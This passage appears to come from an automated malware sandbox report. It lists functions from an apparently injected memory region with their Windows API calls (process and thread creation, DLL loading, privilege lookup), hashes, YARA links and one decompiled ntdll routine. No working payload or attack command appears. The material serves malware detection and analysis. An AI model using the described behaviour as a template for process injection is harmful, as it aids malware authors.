                                              • Opcode Fuzzy Hash: f900fcda8f6669b1d0c8376568bef9b361ab5ffbce75bdd02eeca6d8b53874f7
                                              • Instruction Fuzzy Hash: 4801F231A8032977E720A6A59C42FFEB72C9B00F50F044118FF04BA2C1EA947D068AF5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02D09B40, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                              Download Yara Rule
                                              APIs
                                              • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02D09BB2
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.554339019.0000000002D00000.00000040.00020000.sdmp, Offset: 02D00000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: Load
                                              • String ID:
                                              • API String ID: 2234796835-0
                                              • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                              • Instruction ID: 6c0560b67b234bb447d717505ff0d3308cb702d2c1ff1d3e6a3146ff37259672
                                              • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                              • Instruction Fuzzy Hash: B1010CB5E0020DBBDF10DAA4EC91FDEB3799B54718F004195A90897685F671EA14CBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02D1895E, Relevance: 1.5, APIs: 1, Instructions: 43processCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02D189B4
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.554339019.0000000002D00000.00000040.00020000.sdmp, Offset: 02D00000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: CreateInternalProcess
                                              • String ID:
                                              • API String ID: 2186235152-0
                                              • Opcode ID: 4012af57132fdf84e715f4ab5b4be26cab70deab7d2d820ebc0255ea5c9d7ff6
                                              • Instruction ID: d273fea850dc90ebdffe6b7b910b6a5f1ff62e47178e6425c282773d7fcea3c0
                                              • Opcode Fuzzy Hash: 4012af57132fdf84e715f4ab5b4be26cab70deab7d2d820ebc0255ea5c9d7ff6
                                              • Instruction Fuzzy Hash: FB01AFB2210108BFCB54CF99DD94EEB77AAAF8C354F158258FA0DE7254C630E851CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02D18960, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02D189B4
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.554339019.0000000002D00000.00000040.00020000.sdmp, Offset: 02D00000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: CreateInternalProcess
                                              • String ID:
                                              • API String ID: 2186235152-0
                                              • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                              • Instruction ID: 3b9c7bb5cd1a2bf04501f938e9a8c0bab2091b0eb40b0acccf236b8b4ec26b73
                                              • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                              • Instruction Fuzzy Hash: AE01AFB2214108BBCB54DF89DC90EEB77ADAF8C754F158258FA0D97240C630E851CBA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02D17430, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02D0CCF0,?,?), ref: 02D1746C
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.554339019.0000000002D00000.00000040.00020000.sdmp, Offset: 02D00000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: CreateThread
                                              • String ID:
                                              • API String ID: 2422867632-0
                                              • Opcode ID: 301ba72de499be6b6f63082158b1da9bde1bd3350a698f254bab4a33bdeb0a3a
                                              • Instruction ID: 04c69e23b530ff22467871b1b6c347eab717b23b6b6e70de6cd1e43f7875a8a5
                                              • Opcode Fuzzy Hash: 301ba72de499be6b6f63082158b1da9bde1bd3350a698f254bab4a33bdeb0a3a
                                              • Instruction Fuzzy Hash: A1E092333803043AE33065A9AC02FA7B79DCB81B64F540026FA4DEB6C0D695F80146A4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02D189F7, Relevance: 1.5, APIs: 1, Instructions: 28processCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02D189B4
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.554339019.0000000002D00000.00000040.00020000.sdmp, Offset: 02D00000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: CreateInternalProcess
                                              • String ID:
                                              • API String ID: 2186235152-0
                                              • Opcode ID: 2d2d5fc37828ac5e6410b35890493890fe9536200e702cb44647a751abf7e4bb
                                              • Instruction ID: 414631892b5a0c2ed6278e80fc85c7e526b76e1a5617efd6efb7fa23a8fd60c3
                                              • Opcode Fuzzy Hash: 2d2d5fc37828ac5e6410b35890493890fe9536200e702cb44647a751abf7e4bb
                                              • Instruction Fuzzy Hash: 64E0B6B6254409AF9B04CF98EC90CEB73EEEB8C614B149618FA5DC7245C231EC528BA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02D18A43, Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                              Download Yara Rule
                                              APIs
                                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,02D0CFC2,02D0CFC2,?,00000000,?,?), ref: 02D18A80
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.554339019.0000000002D00000.00000040.00020000.sdmp, Offset: 02D00000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: LookupPrivilegeValue
                                              • String ID:
                                              • API String ID: 3899507212-0
                                              • Opcode ID: 370dfa4cd592b8b665c46a4c69f64ad7f74a99e464ae28e3aa76f68a298a63b4
                                              • Instruction ID: be0848a470afcc228a8a27dfc05c4b63f8298b589d585e8dc8ea55833ff69731
                                              • Opcode Fuzzy Hash: 370dfa4cd592b8b665c46a4c69f64ad7f74a99e464ae28e3aa76f68a298a63b4
                                              • Instruction Fuzzy Hash: 43E022B16082842BDB10DF28DC85ED73FA9DF4A250F14869DFC881B603C435A805CBB5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02D18A50, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                              Download Yara Rule
                                              APIs
                                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,02D0CFC2,02D0CFC2,?,00000000,?,?), ref: 02D18A80
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.554339019.0000000002D00000.00000040.00020000.sdmp, Offset: 02D00000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: LookupPrivilegeValue
                                              • String ID:
                                              • API String ID: 3899507212-0
                                              • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                              • Instruction ID: 88f40cdc2c582a8bfc55167dad114028804d7f91faeb587bf3938058703a5525
                                              • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                              • Instruction Fuzzy Hash: 57E01AB12002086BDB10DF49DC84EE737ADEF88650F018154FA0857241C930E950CBF5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02D188B0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RtlAllocateHeap.NTDLL(02D13536,?,02D13CAF,02D13CAF,?,02D13536,?,?,?,?,?,00000000,00000000,?), ref: 02D188DD
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.554339019.0000000002D00000.00000040.00020000.sdmp, Offset: 02D00000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateHeap
                                              • String ID:
                                              • API String ID: 1279760036-0
                                              • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                              • Instruction ID: 0b1d4b07b7f6712999225cd5e9a4509787b2eca752c525cc3ae17d3599fe36e3
                                              • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                              • Instruction Fuzzy Hash: 78E012B1200208ABDB14EF99DC44EA777ADEF88650F118558FA085B241C630F910CAB0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02D0D427, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                              Download Yara Rule
                                              APIs
                                              • SetErrorMode.KERNELBASE(00008003,?,?,02D07C83,?), ref: 02D0D45B
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.554339019.0000000002D00000.00000040.00020000.sdmp, Offset: 02D00000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorMode
                                              • String ID:
                                              • API String ID: 2340568224-0
                                              • Opcode ID: 65610bb5aa841d86ff45519bcbd3c93a2f9a1c146bcad54572f3fe3041351d84
                                              • Instruction ID: 3326711adf6ef3ef061165ef1c50d6d2798d4f5a4794be1b2c2e0e32c563ca91
                                              • Opcode Fuzzy Hash: 65610bb5aa841d86ff45519bcbd3c93a2f9a1c146bcad54572f3fe3041351d84
                                              • Instruction Fuzzy Hash: 3DD02B3575030037E710EFA4DC46F563795AB50B44F090154F50CDB3C3D624D405C220
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02D0D430, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                              Download Yara Rule
                                              APIs
                                              • SetErrorMode.KERNELBASE(00008003,?,?,02D07C83,?), ref: 02D0D45B
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.554339019.0000000002D00000.00000040.00020000.sdmp, Offset: 02D00000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorMode
                                              • String ID:
                                              • API String ID: 2340568224-0
                                              • Opcode ID: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                                              • Instruction ID: 62c275de1aa69500302bf3df118358dc31be804905d08a2699cab7017fc43a2c
                                              • Opcode Fuzzy Hash: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                                              • Instruction Fuzzy Hash: B4D05E657503043AE610AAA49C02F2632899B45A44F494064FA48963C3DA50E8008561
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0476967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.555074563.0000000004700000.00000040.00000001.sdmp, Offset: 04700000, based on PE: true
                                              • Associated: 0000000D.00000002.555517927.000000000481B000.00000040.00000001.sdmp Download File
                                              • Associated: 0000000D.00000002.555538878.000000000481F000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 4d0cfbc8809cf3e4e13b3d67f34b464da0434db787e08339f27d67d75a09bc4c
                                              • Instruction ID: 3967452773f721ad1ebb4948fd7ccfa12f451338435a96a3e01478388345b2a2
                                              • Opcode Fuzzy Hash: 4d0cfbc8809cf3e4e13b3d67f34b464da0434db787e08339f27d67d75a09bc4c
                                              • Instruction Fuzzy Hash: 14B09BF19015C5C9FB11D76047087177D017BD4745F56C061D2031651A4778D095F5B5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Non-executed Functions

                                              Function 047BFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 53%
                                              			E047BFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0476CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E047B5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E047B5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                              0x047bfdda
                                              0x047bfde2
                                              0x047bfde5
                                              0x047bfdec
                                              0x047bfdfa
                                              0x047bfdff
                                              0x047bfe0a
                                              0x047bfe0f
                                              0x047bfe17
                                              0x047bfe1e
                                              0x047bfe19
                                              0x047bfe19
                                              0x047bfe19
                                              0x047bfe20
                                              0x047bfe21
                                              0x047bfe22
                                              0x047bfe25
                                              0x047bfe40

                                              APIs
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 047BFDFA
                                              Strings
                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 047BFE2B
                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 047BFE01
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.555074563.0000000004700000.00000040.00000001.sdmp, Offset: 04700000, based on PE: true
                                              • Associated: 0000000D.00000002.555517927.000000000481B000.00000040.00000001.sdmp Download File
                                              • Associated: 0000000D.00000002.555538878.000000000481F000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                              • API String ID: 885266447-3903918235
                                              • Opcode ID: 243fd6dd8724b2cbf2b576d67f6156360489145de2727c6b7fd00d7cd60b0371
                                              • Instruction ID: fb75e007bbbba1f22e74ca171a8d193489f4ca82da2fc0649a258acd68121116
                                              • Opcode Fuzzy Hash: 243fd6dd8724b2cbf2b576d67f6156360489145de2727c6b7fd00d7cd60b0371
                                              • Instruction Fuzzy Hash: 81F0F676200641BFE7211E59DC06F73BB6AEB45B34F140354FA68562E1EA62F83097F4
                                              Uniqueness

                                              Uniqueness Score: -1.00%